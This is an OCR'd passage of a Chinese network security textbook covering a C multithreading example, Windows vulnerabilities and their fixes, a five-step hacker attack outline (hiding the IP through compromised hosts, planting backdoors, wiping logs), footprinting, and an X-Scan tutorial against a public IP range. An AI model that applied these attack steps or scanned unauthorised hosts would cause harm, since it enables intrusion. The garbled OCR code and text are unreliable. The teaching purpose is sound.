
图 3-25 修改 程序 的 执行 方式 


“C:\Program Files\Microsoft Yisual Studio\MyProjects\te 
he value of 10 is 5 
he value of 12 is 6 


General | Debug CiC++ | Link | Resources | Bi 


YY 分 类 : [Code Generation i 
General he value of 12 is ? 
IC+rtanguage —— ~ 4 he value of 18 is 7 

he value of 11 is 5 
和 lomize - he value of 12 is 8 
ens he value of 12 is 9 


Li 
Calling cor Optimizations ber alignment: he value of 10 is 8 
cdecl* |Precompiled Headers 四 he value of 12 is 10 
er he value of 10 is 9 


Preprocessor 


he value of 11 is 6 


图 3-26 修改 工程 配置 图 3-27 proj8. cpp 运行 结果 


程序 中 有 两 处 需要 说 明 。 首 先 Process. h 头 文件 中 包含 对 beginthread 等 多 线程 的 相 
关 定 义 。 

其 次 ,这 三 个 函数 _beginthread ((void (* ) (void *))addem, 0, (void * )10); 
_beginthread((void (* )(void * ))addem, 0, (void * )11); addem(12) 分 别 定义 启动 了 
三 个 线程 ，beginthread 有 三 个 参数 ,第 一 个 参数 addem 是 线程 要 执行 的 函数 名 ,这 里 是 
addem; 第 二 个 参数 是 为 该 线程 分 配 堆栈 的 大 小 ,这 里 是 0; 第 三 个 参数 是 调用 函数 的 参数 ， 
这 里 分 别 是 10、11, 相 当 于 addem(10) 和 addem(11)。 在 实际 编程 中 更 多 是 多 个 线程 同时 
做 同一 件 事 情 , 这 就 需要 多 个 线程 共享 一 些 资源 ,如 程序 proj9. cpp。 

proj9. cpp 

#include < process. h> 

#include < stdlib. h> 

#include < stdio. h> 

int addem( int); 

int x; ”// 全 局 变量 

int main( int argc, char * argv[]) 

{ 

x=0; 

_beginthread( (void (* )(void * ))addem, 0, (void < )1); 
_beginthread( (void ( * )(void * ))addem, 0, (void * )2); 
addem(3); 

return 0; 
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} 
int addem( int index) 
{ while (x<= 50){ ( 
X= xX+1; 
printf("%d: %d\n", index, x); 
} 


return 0; 


} 


程序 中 三 个 线程 共享 全 局 变量 x, 三 个 线程 都 给 变量 x 做 加 1 的 操作 。 程 序 执行 的 结 
果 如 图 3-28 所 示 。 


图 3-28 ”proj9. cpp 运行 结果 
这 种 多 线程 共享 变量 的 编程 方法 一 般 在 端口 扫描 或 者 暴力 破解 的 时 候 使 用 。 
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本 章 学 习 要 求 : 

。 了 解 Windows 系统 常见 漏洞 及 其 修复 。 
。 熟悉 黑客 攻击 步骤 。 

。 了 解 网 络 踩点 的 概念 。 

。 熟悉 网 络 扫描 和 网 络 监听 的 概念 。 

。 掌握 常用 网 络 扫描 工具 的 使 用 。 

。 掌握 常用 网 络 监 听 工 具 的 使 用 。 

。 熟悉 网 络 扫描 与 监听 的 防范 措施 。 


4.1 网 络 安全 漏洞 


4.1.1 漏洞 的 概念 


漏洞 是 指 任 何 会 引起 系统 的 安全 性 受到 破坏 的 事物 ,是 在 硬件 .软件 ,协议 的 具体 实现 
或 系统 安全 策略 上 存在 的 缺陷 ,包括 不 恰当 的 操作 ,配置 不 当 和 弱 口 令 等 ,从 而 可 以 使 攻击 
者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 可 以 说 ,任何 系统 都 存在 漏洞 ,没有 绝对 安全 。 

漏洞 经 常 被 黑客 利用 ,从 而 进行 网 络 攻击 。 漏 洞 有 如 下 三 个 特性 。 

1. 长 久 性 

漏洞 与 时 间 紧 密 相 关 。 一 个 系统 从 发 布 的 第 一 天 起 , 随 着 用 户 的 深入 使 用 ,其 中 存在 的 
漏洞 会 被 不 断 暴 露出 来 , 随 之 被 发 现 的 漏洞 也 会 不 断 被 系统 供应 商 发 布 的 补丁 修补 ,或 在 以 
后 发 布 的 新 版 本 中 得 以 纠正 。 随 着 时 间 的 推移 , 旧 的 漏洞 会 不 断 消失 ,新 的 漏洞 会 不 断 出 
现 。 漏洞 问题 也 会 长 期 存在 。 例 如 ,微软 的 Windows XP, 自 发 布 以 来 ,微软 就 不 断 地 给 系 
统 打 补 丁 , 升 级 。 

2. 多 样 性 

漏洞 会 影响 到 很 大 范围 的 软 硬 件 设备 ,包括 操作 系统 本 身 及 其 支撑 软件 ,网 络 客户 和 服 
务 器 软件 ,网 络 路 由 器 和 安全 防火 墙 等 。 也 就 是 说 ,在 这 些 不 同 的 软 硬 件 设 备 中 都 可 能 存在 
不 同 的 漏洞 问题 。 在 不 同 种 类 的 软 、 硬 件 设 备 , 同 种 设备 的 不 同 版 本 之 间 , 由 不 同 设 备 构成 
的 不 同系 统 之 间 ,以 及 同 种 系统 在 不 同 的 设置 条 件 下 ,都 会 存在 各 自 不 同 的 漏洞 问题 。 

3. 隐蔽 性 

漏洞 是 在 系统 具体 使 用 和 实现 过 程 中 产生 的 错误 ,只 有 能 威胁 到 系统 安全 的 错误 才 是 
漏洞 。 许 多 错误 在 通常 情况 下 并 不 会 对 系统 安全 造成 危害 ,只 有 在 某 些 条 件 下 被 人 利用 时 
才 会 影响 系统 安全 。 漏 洞 不 是 自己 出 现 的 ,而 是 被 使 用 者 发 现 的 。 攻 击 者 往往 是 系统 漏洞 
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的 发 现 者 和 使 用 者 。 从 某 种 意义 上 讲 , 是 攻击 者 使 网 络 系统 变 得 越 来 越 安全 。 

这 里 需要 注意 漏洞 与 不 同安 全 级 别 计算 机 系统 之 间 的 关系 。 理 论 上 说 ,系统 的 安全 级 
别 越 高 ,该 系统 也 越 安 全 。 其 实 不 然 。 橘 皮 书 一 一 受信 任 计算 机 系统 评价 基准 (Trusted 
Compnuter System Evaluation Criteria) ,将 一 个 计算 机 系统 可 接受 的 信任 程度 加 以 分 级 , 即 
计算 机 系统 的 安全 性 能 由 高 而 低 划分 为 A、B、C、D 四 大 等 级 。 其 实 , 漏 洞 是 独立 于 操作 系 
统 本 身 的 理论 安全 级 别 而 存在 的 。 并 不 是 说 ,系统 所 属 的 安全 级 别 越 高 ,该 系统 中 存在 的 漏 
洞 就 越 少 。 而 是 在 安全 性 较 高 的 系统 当中 ,入 侵 者 如 果 和 希望 进一步 获得 特权 或 对 系统 造成 
较 大 的 破坏 时 ,必须 要 克服 更 大 的 障碍 。 


4.1.2 漏洞 产生 的 原因 


如 今 在 Internet 上 ,网 络 的 安全 性 问题 越 来 越 严 重 。 一 方面 ,黑客 利用 安全 漏洞 引起 的 
安全 事件 数量 呈 上 升 趋势 。 另 一 方面 ,似乎 越 是 大 型 软件 ,其 后 推出 的 补丁 数量 也 呈 上 升 趋 
势 , 其 中 大 部 分 的 补丁 是 针对 漏洞 的 。 漏 洞 产生 的 原因 ,归纳 起 来 有 以 下 几 个 方面 。 

1. 早期 Internet 设计 的 缺陷 

Internet 设计 的 初衷 是 为 了 相互 交流 ,实现 资源 共享 。 设 计 者 并 未 充分 考虑 网 络 安全 
需求 。Internet 的 开放 性 使 得 其 在 短期 内 得 到 着 勃发 展 。 也 正 因 如 此 ,攻击 者 能 快速 、 低 成 
本 地 对 网 络 进行 攻击 ,而 把 自己 隐藏 起 来 ,不 被 觉察 和 跟踪 。 

2. 网 络 开源 

网 络 的 开源 使 得 攻击 者 技术 不 断 提高 ,攻击 的 教程 和 工具 在 网 上 可 以 轻易 找到 。 这 样 ， 
造成 攻击 事件 增多 ,而 且 攻 击 早期 不 易 被 网 络 安全 人 员 发 觉 。 

3. 软件 自身 缺陷 


随 着 Internet 的 发 展 , 各 种 各 样 新 型 ,复杂 的 网 络 服务 和 软件 层出不穷 ,这 些 服务 和 软 
件 在 设计 、. 部 署 和 维护 上 都 可 能 存在 各 种 安全 问题 。 为 保证 在 市 场 竞争 中 占 得 先 机 ,任何 设 
计 者 都 不 能 保证 产品 中 没有 错误 ,这 就 造成 了 软件 本 身 存在 的 漏洞 。 同 时 ,商业 系统 为 迎合 
用 户 需求 的 易 用 性 、 维 护 性 等 要 求 , 大 多 数 情况 下 ,不 得 不 牺牲 安全 性 和 可 靠 性 。 


4.1.3 漏洞 的 分 类 和 等 级 


1. 漏洞 的 分 类 

千里 堤坝 , 毁 于 蚁 穴 。 黑 客 一 旦 找到 网 络 中 的 薄弱 环节 ,就 能 轻而易举 地 冯 和 人 系统。 所 
以 ,了 解 系统 中 哪里 存在 安全 隐患 ,并 及 时 修补 漏洞 至 关 重 要 。 通 常 ,“ 蚁 穴 ” 主 要 表现 在 软 
件 或 协议 设计 存在 缺陷 .软件 或 协议 实现 的 漏洞 以 及 系统 或 网 络 配置 不 当 等 方面 。 具 体 表 
现在 以 下 几 个 方面 。 

1) 软件 或 协议 设计 存在 缺陷 

协议 是 定义 网 络 上 计算 机 会 话 和 通信 的 规则 ,如 果 协 议 的 设计 存在 漏洞 ,那么 无 论 使 用 
该 协议 的 应 用 服务 设计 得 多 完美 , 它 仍 然 是 存在 漏洞 的 。 如 TCP/IP 的 缺陷 ,TCP/IP 现在 
已 经 广 为 应 用 , 它 早 期 设计 存在 的 不 足 造成 的 安全 漏洞 在 所 难免 。 例 如 smurf 攻击 、IP 地 
址 欺骗 等 。 然 而 ,最 大 的 问题 在 于 IP 协议 是 非常 容易 “轻信 ”的 ,就 是 说 入侵 者 可 以 随意 地 
伪造 及 修改 IP 数据 包 而 不 被 发 现 。IPSec 协议 可 以 用 来 克服 这 个 不 足 ,但 还 没有 得 到 广泛 
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的 应 用 。 

2) 软件 或 协议 实现 的 漏洞 

即使 是 协议 设计 得 足够 完美 ,但 在 实现 过 程 中 引入 漏洞 也 是 不 可 避免 的 。 如 邮件 协议 
的 一 个 实现 中 能 够 让 攻击 者 通过 与 受害 主机 的 邮件 端口 建立 连接 ,达到 欺骗 受害 主机 执行 
非法 任务 的 目的 ,或 者 使 人 侵 者 具有 访问 受 保护 文件 和 执行 服务 器 程序 的 权限 。 这 样 的 漏 
洞 往往 导致 攻击 者 不 需要 访问 主机 的 凭证 就 能 够 从 远程 控制 服务 器 。 

3) 系统 或 网 络 配置 不 当 

许多 系统 安装 后 都 有 默认 的 安全 配置 信息 ,默认 配置 往往 存在 不 足 。 所 以 管理 员 要 及 
时 更 改 配置 ,避免 入 侵 者 利用 这 些 配置 对 服务 器 进行 攻击 。 如 FTP 的 匿名 账号 就 曾 给 不 少 
管理 员 带 来 麻烦 。 又 如 ,有 时 为 了 测试 使 用 ,管理 员 会 在 机 器 上 打开 一 个 临时 端口 ,但 测试 
完 后 却 忘 记 了 禁止 它 , 这 样 就 会 使 人 侵 者 有 漏洞 可 钻 。 通 常 的 解决 策略 是 : 除非 一 个 端口 
是 必须 使 用 的 ,否则 应 该 关闭 此 端口 。 

2. 漏洞 的 等 级 

一 般 来 说 ,漏洞 威胁 的 类 型 基本 上 决定 了 它 的 严重 性 ,根据 漏洞 所 造成 的 影响 和 危害 程 
度 可 把 严重 性 分 成 高 .中 、 低 三 个 级 别 。 

1) 低级 别 漏洞 ,允许 拒绝 服务 的 漏洞 

允许 拒绝 服务 的 漏洞 属 低级 。 这 种 攻击 几乎 总 是 基于 操作 系统 的 。 也 就 是 说 ,这 些 漏 
洞 存在 于 操作 系统 网 络 传送 本 身 。 当 存在 这 种 漏洞 时 ,必须 通过 软件 开发 者 或 销售 商 的 弥 
补 予 以 纠正 。 

2) 中 级 别 漏洞 ,允许 本 地 用 户 非法 访问 的 漏洞 

中 级 漏洞 允许 本 地 用 户 获 得 增加 的 和 未 授权 的 访问 ,这 种 漏洞 一 般 在 多 种 平台 的 应 用 
程序 中 发 现 , 大 多 数 中 级 别 漏洞 是 由 应 用 程序 的 缺陷 引起 的 。 

3) 高 级 别 漏洞 ,允许 远程 用 户 未 经 授权 访问 的 漏洞 

高 级 别 漏洞 是 威胁 性 最 大 的 漏洞 。 大 多 数 高 级 别 漏洞 是 由 于 较 差 的 系统 管理 或 设置 有 
误 造 成 的 。 例 如 ,远程 和 本 地 管理 员 权 限 应 该 对 应 高 级 ,普通 用 户 权 限 .权限 提升 . 读 取 受 限 
文件 .远程 和 本 地 拒绝 服务 对 应 中 级 ,远程 非 授权 文件 存 取 、 恢 复 . 欺 骗 、. 服 务 器 信息 泄漏 对 
应 低级 。 但 很 多 时 候 要 具体 情况 具体 分 析 , 如 果 一 个 被 广泛 使 用 的 软件 存在 弱 口 令 问题 ,有 
口令 恢复 漏洞 ,应 该 属于 中 高 级 。 


4.1.4 Windows 系统 常见 漏洞 及 其 修复 


Windows 系统 常见 的 漏洞 包括 : IIS 漏洞 微软 数据 访问 部 件 (MDAC) 漏 洞 、NetBIOS/ 
Windows 网 络 共享 漏洞 .匿名 登录 漏洞 LAN Manager 身份 认证 漏洞 .Windows 弱 口 令 IE 
浏览 器 漏洞 .远程 注册 表 访 问 漏洞 。 

1. JIS 漏洞 

IIS(Internet Information Server) ,中 文 名 称 是 互联 网 信息 服务 器 。 微 软 的 IIS 存在 组 
存 溢 出 漏洞 , 它 难以 有 效 地 过 滤 客 户 端 请 求 ,执行 应 用 脚本 的 能 力 较 差 。 部 分 漏洞 问题 可 以 
通过 已 发 布 的 补丁 解决 :但 每 次 IIS 的 新 版 本 发 布 都 带 来 新 的 漏洞 ,因此 IIS 出 现 安全 漏洞 
并 不 能 完全 归罪 于 网 管 的 玻 漏 。 


82 网 络 安全 教程 及 实践 


适用 性 说 明 : Windows NT4 运行 IIS 4. 0. Windows 2000 运行 IIS 5.0, Windows XP 
Pro 运行 IIS 5.1,Windows 2003 运行 IIS 6.0,Windows 2008 运行 IIS 7.0。 

修复 方法 : 安装 补丁 文件 。 为 系统 安装 最 新 的 IIS 补丁 ,并 在 IIS 中 排除 恶意 用 户 的 访 
问 IP 地址 ( 详 见 : http://www. microsoft. com/technet/security/tools/urlscan. asp) 。 删 
除 IIS 中 默认 支持 的 ISAPI 扩展 名 。 诸 如 : . htr、. idq、. ism 以 及 . printer, 这 些 可 执行 脚本 
的 扩展 名 在 IIS 安装 时 默认 支持 ,但 用 户 很 少 会 用 它们 。 删 除 \inetpub\wwwroot\scripts 
目录 中 的 脚本 样本 文件 。 同 样 ,在 进行 IIS 安装 时 不 要 安装 远程 管理 工具 。 

2. 微软 数据 访问 部 件 (MDAC ) 漏 洞 

微软 数据 访问 部 件 (Microsoft Data Access Components, MDAC) 的 远程 数据 服务 单元 
有 一 个 编码 错误 ,远程 访问 用 户 有 可 能 通过 这 一 漏洞 获得 远程 管理 的 权限 ,并 有 可 能 使 数据 
库 遭 到 外 部 匿名 攻击 。 

适用 性 说 明 : NT 4.0 系统 运行 IIS 3.0 和 IIS 4. 0。 

修复 方法 : 升级 MDAC 到 2. 1 或 更 新 的 版 本 。 

3. NetBIOS/Windows 网 络 共享 漏洞 

使 用 服务 器 信息 块 (SMB) 协 议 或 通用 互联 网 文件 系统 (CIFS) ,将 使 远程 用 户 可 以 访问 
本 地 文件 ,但 也 向 攻击 者 开放 了 系统 。 

适用 性 说 明 : 所 有 的 Windows 系统 。 

修复 方法 : 限制 文件 的 访问 共享 ,并 指定 特定 IP 的 访问 限制 以 避免 域名 指向 欺骗 。 关 
闭 不 必要 的 文件 服务 ,取消 这 一 特性 并 关闭 相应 端口 。 

4. 匿名 登录 漏洞 

Window 操作 系统 的 账户 服务 至 关 重 要 ,一旦 用 户 通过 匿名 登录 进程 后 就 可 以 匿名 访 
问 其 他 系统 中 的 文件 。 同 时 ,这 也 意味 着 攻击 者 可 以 匿名 进入 系统 。 

适用 性 说 明 : Windows NT、Windows 2000 以 及 Windows XP 系统 。 

修复 方法 : 用 户 唯 一 可 以 补救 的 就 是 修改 注册 表 限 制 这 一 潜在 的 威胁 。 

5. LAN Manager 身份 认证 漏洞 

尽管 Windows 的 大 多 数 用 户 不 再 需要 LAN Manager 的 支持 ,微软 还 是 在 Windows 
NT 和 Windows 2000 系统 里 默认 安装 了 LAN Manager 口令 散 列 。 由 于 LAN Manager 使 
用 的 早期 加 密 机 制 比 微软 现在 的 方法 脆弱 ,即使 相当 强健 的 LAN Manager 的 口令 也 能 在 
很 短 的 时 间 内 被 破解 。 

适用 性 说 明 : 所 有 的 Windows 操作 系统 ,默认 安装 的 Windows NT、Windows 2000 和 
Windows XP 都 存在 这 一 漏洞 。 

修复 方法 : 只 要 用 户 用 不 到 它 ,就 尽快 取消 LM 认证 支持 。 

6. Windows 弱 口 令 

尽管 各 种 系统 设置 都 要 求 用 户 使 用 足够 强壮 的 密码 并 进行 定期 更 换 , 但 用 户 往往 不 会 
严格 遵守 系统 管理 员 做 出 的 各 种 限制 .这 就 引发 了 访问 控制 的 脆弱 性 。 

适用 性 说 明 : 所 有 使 用 密码 保护 的 系统 和 应 用 软件 。 

修复 方法 : 重视 密码 强壮 性 ,并 把 这 一 原则 贯彻 始终 。 
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7. IE 浏览 器 漏洞 

IE 浏览 器 用 户 面临 着 ActiveX 控件 漏洞 ,脚本 漏洞 ,MIME 类 型 和 内 容 的 误 用 漏洞 以 
及 缓存 区 溢出 漏洞 等 方面 的 威胁 。 

修复 方法 : 升级 并 安装 补丁 文件 。 微 软 不 再 支持 版 本 早 于 5.01 的 I 下 浏览 器 ,因此 用 
户 在 使 用 I 浏览 器 时 必须 升级 到 5. 01 或 更 高 版 本 。 完 成 浏览 器 升级 到 IE 5.01 或 IE 5.5 
后 ,安装 IE 5.01 服务 包 或 IE 5.5 服务 包 。 目 前 的 操作 系统 通常 集成 的 是 IE 6. 0、IE 7.0 
或 者 IE 8.0, 其 安全 性 相对 较 高 。 

8. 远程 注册 表 访 问 漏洞 

在 任何 Windows 系统 中 ,注册 表 都 是 最 重要 的 文件 ,而 允许 远程 访问 注册 表 将 带 来 很 
大 危害 。 

适用 性 说 明 : 所 有 的 Windows 版 本 。 

修复 方法 : 限制 访问 。 这 并 非 是 软件 的 bug ,而 是 Windows 系统 所 具备 的 一 个 特性 , 因 
此 用 户 必须 通过 限制 访问 权限 来 避免 潜在 的 威胁 。 

如 今 ,Windows 操作 系统 已 经 成 为 当今 操作 系统 的 主流 ,同时 也 成 为 黑客 攻击 的 对 象 。 
如 果 了 解 Windows 系统 常见 漏洞 及 其 修复 ,将 会 便于 网 络 管理 人 员 在 网 络 维护 中 做 到 有 的 
放 矢 。 


4.2 ”黑客 攻击 步 又 


黑客 进行 一 次 成 功 的 攻击 ,可 以 归纳 成 基本 的 5 个 步骤 ,但 是 根据 实际 情况 可 以 随时 调 
整 。 归 纳 起 来 就 是 “黑客 攻击 五 部 曲 ”。 
1. 隐藏 IP 


通常 有 两 种 方法 隐藏 自己 的 IP: 

(1) 首先 入 侵 互联 网 上 的 一 台 计 算 机 (俗称 "肉鸡 ”) ,利用 这 人 台 计 算 机 进行 攻击 ,这样 即 
使 被 发 现 了 ,也 是 “肉鸡 ”的 IP 地 址 。 

(2) 做 多 极 跳板 “Sock 代理 ”, 在 入 侵 的 计算 机 上 留 下 的 是 代理 计算 机 的 IP 地 址 。 

比如 攻击 A 国 的 站 点 ,一 般 选择 离 A 国 很 远 的 B 国 计 算 机 作为 “肉鸡 ”或 者 “代理 ”, 这 
样 跨国 度 的 攻击 ,一 般 很 难 被 侦破 。 

2. 踩点 扫描 

踩点 就 是 通过 各 种 途径 对 所 要 攻击 的 目标 进行 多 方面 的 了 解 ,确定 攻击 的 时 机 。 扫 描 
的 目的 是 利用 各 种 工具 在 攻击 目标 的 IP 地 址 或 地 址 段 的 主机 上 寻找 漏洞 。 

3. 获得 权限 

得 到 管理 员 权 限 的 目的 是 连接 到 远程 计算 机 ,对 其 进行 控制 ,达到 攻击 目的 。 获 得 系统 
及 管理 员 权 限 的 方法 有 : 通过 系统 漏洞 获得 系统 权限 ,通过 管理 漏洞 获得 管理 员 权 限 ,通过 
软件 漏洞 得 到 系统 权限 ,通过 监听 获得 敏感 信息 进一步 获得 相应 权限 ,通过 弱 口 令 获 得 远程 
管理 员 的 用 户 密码 ,通过 穷 举 法 获得 远程 管理 员 的 用 户 密 码 , 通 过 攻破 与 目标 机 有 信任 关系 
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的 另 一 台 机 器 进而 得 到 目标 机 的 控制 权 , 通 过 欺骗 获得 权限 以 及 其 他 有 效 的 方法 。 
4. 种 植 后 门 
上 传 恶意 软件 ,以 确保 能 够 重新 进入 系统 。 在 已 经 攻破 的 计算 机 上 种 植 一 些 后 门 程序 。 
5. 隐藏 踪迹 
抹 除 恶意 活动 的 痕迹 ,删除 或 修改 系统 和 应 用 程序 日 志 中 的 数据 。 一 次 成 功 入 侵 之 后 ， 
一 般 在 对 方 的 计算 机 上 已 经 存储 了 相关 的 登录 日 志 , 这 样 就 容易 被 管理 员 发 现 。 


4.3 网 络 踩 点 


踩点 就 是 通过 各 种 途径 对 所 要 攻击 的 目标 进行 尽 可 能 的 了 解 。 攻 击 任何 一 个 网 络 ,第 
一 个 步 又 就 是 要 搞 清楚 要 攻击 的 对 象 ,要 获取 目标 网 络 的 “足迹 ”。 常 见 的 踩点 方法 包括 ， 
在 域名 及 注册 机 构 的 查询 ,了 解 公司 性 质 , 对 主页 进行 分 析 ,邮件 地 址 的 搜集 和 目标 IP 地 址 
范围 查询 。 

踩点 的 目的 就 是 探查 对 方 各 方面 的 情况 ,确定 攻击 的 时 机 , 摸 清 对 方 最 薄弱 的 环节 和 守 
卫 最 松散 的 时 刻 ,为 下 一 步 入 侵 提供 良好 的 策略 。 

通过 踩点 主要 收集 以 下 可 用 信息 。 

(1) 网 络 域名 : 包括 域名 系统 、 网 络 地 址 范围 .关键 系统 (如 名 字 服 务 器 .电子 邮件 服务 
器 、 网 关 等 ) 的 具体 位 置 以 及 网 络 地 址 范围 等 信息 。 

(2) 内 部 网 络 : 进入 内 网 以 后 主要 是 靠 工 具 和 扫描 来 完成 踩点 。 

(3) 外 部 网 络 : 目标 站 点 的 一 些 社会 信息 ,包括 企业 的 内 部 专用 网 .企业 的 合作 伙伴 和 
分 支 机 构 等 其 他 公开 资料 。 通 过 搜索 引擎 来 获得 目标 站 点 里 面 的 用 户 邮件 列表 、 即 时 消息 、 
新 闻 消 息 及 员工 的 个 人 资料 等 。 


4.4 网 络 扫 描 


4.4.1 网 络 扫 描 简 介 


网 络 扫描 是 黑客 攻击 的 第 二 步 。 其 原理 是 采取 模拟 攻击 的 形式 对 目标 可 能 存在 的 已 知 
安全 漏洞 逐 项 进行 检查 ,目标 可 以 是 工作 站 、 服 务 器 交换机、 路 由 器 和 数据 库 应 用 等 对 象 ， 
最 后 根据 扫描 结果 向 扫描 者 或 管理 员 提供 周密 可 靠 的 分 析 报 告 。 

扫描 通常 采用 两 种 策略 ,一 种 是 被 动 式 策略 ,就 是 基于 主机 之 上 ,对 系统 中 不 合适 的 设 
置 、 脆 弱 的 口令 以 及 其 他 同安 全 规则 抵触 的 对 象 进行 检查 ; 另 一 种 是 主动 式 策略 , 它 是 基于 
网 络 的 ,通过 执行 一 些 脚本 文件 模拟 对 系统 进行 攻击 的 行为 并 记录 系统 的 反应 ,从 而 发 现 其 中 
的 漏洞 。 被 动 式 扫描 不 会 对 系统 造成 破坏 ,而 主动 式 扫描 对 系统 进行 模拟 攻击 ,可 能 会 对 系统 
造成 破坏 。 利 用 被 动 式 策略 扫描 称 为 系统 安全 扫描 ,利用 主动 式 策略 扫描 称 为 网 络 安全 扫描 。 

常见 的 安全 扫描 检测 技术 主要 包括 以 下 4 个 方面 。 

(1) 基于 应 用 的 检测 技术 , 它 采 用 被 动 的 , 非 破 坏 性 的 办 法 检查 应 用 软件 包 的 设置 ,发 
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现 安全 漏洞 。 

(2) 基于 主机 的 检测 技术 , 它 采 用 被 动 的 , 非 破 坏 性 的 办 法 对 系统 进行 检测 。 通 过 在 主 
机 本 地 的 代理 程序 对 系统 配置 .注册 表 、 系 统 日 志 、 文 件 系统 或 数据 库 活 动 进行 监视 扫描 , 然 
后 与 系统 的 漏洞 库 进行 比较 ,如 果 满 足 匹 配 条 件 , 则 认为 漏洞 存在 。 例 如 ,利用 低 版 本 的 
DNS Bind 漏洞 ,攻击 者 能 够 获得 root 权限 ,侵入 系统 ,或 在 远程 计算 机 中 执行 恶意 代码 。 

(3) 基于 目标 的 漏洞 检测 技术 , 它 采 用 被 动 的 、 非 破坏 性 的 办 法 检查 系统 属性 和 文件 属 
性 ,如 数据 库 、 注 册 号 等 。 

(4) 基于 网 络 的 检测 技术 , 它 采 用 积极 的 、 非 破坏 性 的 办 法 来 检验 系统 是 否 有 可 能 被 攻 
击 衣 溃 。 它 利用 了 一 系列 的 脚本 模拟 对 系统 进行 攻击 的 行为 ,然后 对 结果 进行 分 析 。 它 还 
针对 已 知 的 网 络 漏洞 进行 检验 。 基 于 网 络 的 检测 技术 常 被 用 来 进行 穿 透 实验 和 安全 和 审计。 
这 种 技术 可 以 发 现 一 系列 平台 的 漏洞 ,也 容易 安装 。 但 是 , 它 可 能 会 影响 网 络 的 性 能 。 

网 络 漏洞 虽 多 ,但 并 不 全 是 无 法 阻止 的 。 防 火 墙 技术 是 被 动 防御 ,而 网 络 扫描 是 主动 防 
御 。 若 采用 多 种 扫描 技术 相 结合 ,增强 漏洞 识别 的 准确 度 ,网络 安全 性 会 得 到 很 大 的 提升 。 


4.4.2 常用 网 络 扫描 工具 


扫描 软件 从 最 初 的 专门 为 UNIX 系统 编写 的 一 些 只 具有 简单 功能 的 小 程序 ,发展 到 现 
在 ,已 经 出 现 了 多 个 运行 在 各 种 操作 系统 平台 上 的 .具有 复杂 功能 的 商业 程序 。 今 后 的 发 展 
趋势 ,主要 有 以 下 几 个 方面 。 

(1) 使 用 插件 (plugin) 或 者 叫做 功能 模块 技术 。 

(2) 使 用 专用 脚本 语言 。 

(3) 由 安全 扫描 程序 到 安全 评估 专家 系统 。 

有 些 计算 机 安全 管理 人 员 会 考虑 购买 一 套 安全 扫描 系统 ,用 户 选 择 安全 扫描 产品 还 应 
注意 升级 .可 扩充 性 .人 员 培 训 和 全 面 的 解决 方案 等 问题 。 

总 之 ,网 络 扫描 工具 是 把 双 刃 剑 , 黑 客 利 用 它 人 侵 系 统 , 而 系统 管理 员 掌握 它 以 后 又 可 
以 有 效 地 防范 黑客 人 侵 。 下 面 介绍 几 种 常用 的 扫描 工具 的 使 用 方法 。 

1. X-Scan 


1) X-Scan 简介 

X-Scan 是 国内 最 著名 的 综合 扫描 器 之 一 , 它 完全 免费 ,无 须 注册 ,是 不 需要 安装 的 绿色 
软件 。 其 界面 支持 中 文 和 英文 两 种 语言 ,包括 图 形 界面 和 命令 行 方式 。 主 要 由 国内 著名 的 
民间 黑客 组 织 “ 安 全 焦点 ”(http://www. xfocus. net) 完 成 ,从 2000 年 的 内 部 测试 版 X-Scan 
V0.2 到 目前 的 最 新 版 本 X-Scan3. 3-cn 都 凝聚 了 国内 众多 黑客 的 心血 。 最 值得 一 提 的 是 ， 
X-Scan 把 扫描 报告 和 安全 焦点 网 站 相连 接 ,对 扫描 到 的 每 个 漏洞 进行 “风险 等 级 ”评估 ,并 
提供 漏洞 描述 和 漏洞 溢出 程序 ,方便 网 管 测试 、 修 补漏 洞 。 

2) 系统 要 求 

X-Scan 可 以 运行 在 Windows NT/2000/XP/2003/2008 操作 系统 。 理 论 上 虽 可 运行 于 
Windows NT 系列 操作 系统 ,但 推荐 运行 于 Windows 2000 以 上 的 Server 版 Windows 
系统 。 

案例 4-1 通过 X-Scan 扫描 某 个 网 段 主机 

本 例 使 用 X-Scan v3. 3 进行 某 个 网 段 主机 的 扫描 。 双 击 X-Scan 图 标 (xscan_gui. exe)， 
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打开 其 图 形 界面 ,如 图 4-1 所 示 。 


YX-Scan v3.3 GUI 


文件 四 设置 加 查看 &) 工具 QD Laneuaee 帮助 吕 ) 
@IP In | 图 吉 | 回 
普通 信息 | 漏洞 信息 | 铺 误 信 息 | 


x-Sean-v3.3 使 用 说 明 


| 一 . 系统 要 求 : findows 机/2000/XP/2003 
理论 上 可 运行 于 Findows 矶 系列 哲 作 系统 ， 推 荐 运行 于 Windews 2000 以 上 的 Server 
版 windows 系 纺 。 


二 -功能 简介 : 


ee 


多 数 已 知 漏 i 


和 
i i Ei i 
了 ee Sos 
识 府 细 资料 : “http 二 wfoc /projects/X-S' 


| 三 ， 所 需 文件 ; 


图 4-1 X-Scan 图 形 界面 
通过 X-Scan 扫描 某 个 网 段 主机 ,操作 步骤 分 为 以 下 三 步 。 
步骤 一 ,设置 扫描 参数 。 
(1) 设置 扫描 的 检测 范围 。 选 择 菜单 栏 * 设 置 ">“ 扫 描 参 数 ” 一 “指定 IP 范围 "。 本 例 
中 指定 IP 范围 是 219. 246. 5. 170 一 219. 246. 5. 224, 如 图 4-2 所 示 。 如 果 只 扫描 一 台 主 机 ， 
直接 在 “指定 IP 范围 ”内 写 入 这 台 主 机 的 IP 地 址 即 可 。 


C6I 相 关 设置 
字典 文件 设置 


4-2 设置 检测 范围 


(2) 全 局 设置 。 这 里 只 要 有 针对 性 地 对 需要 扫描 的 模块 勾 选 即 可 ,如 图 4-3 所 示 。 

在 此 对 “全 局 设置 "选项 中 的 参数 进行 简单 介绍 。 选 中 “全 局 设置 ”选项 中 的 “并 发 扫描 ” 
选项 ,在 该 选项 中 用 户 可 以 对 “最 大 并 发 主机 数量 "和 “最 大 并 发 线程 数量 "进行 设置 。 选 中 
“全 局 设置 ”选项 中 的 “扫描 报告 ”选项 ,在 该 选项 中 用 户 可 以 对 扫描 报告 的 名 称 和 格式 进行 
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设置 。 在 “报告 文件 ”文本 框 中 输入 扫描 报告 的 名 称 。 在 “报告 文件 类 型 "下 拉 列 表 中 有 
HTML、TXT 和 XML 三 个 选项 ,本 例 选择 HTML 选项 , 即 扫描 报告 会 以 网 页 形式 打开 。 


字典 文件 设置 


图 4-3 设置 扫描 模块 


选中 “全 局 设置 ”选项 中 的 “其 他 设置 "选项 ,在 该 选项 中 可 以 设置 遇 到 无 响应 的 主机 和 没 
有 开放 端口 的 主机 时 采取 的 操作 。 如 果 选 中 * 跳 过 没有 响应 的 主机 ? 单 选 按钮 ,X-Scan 扫描 器 
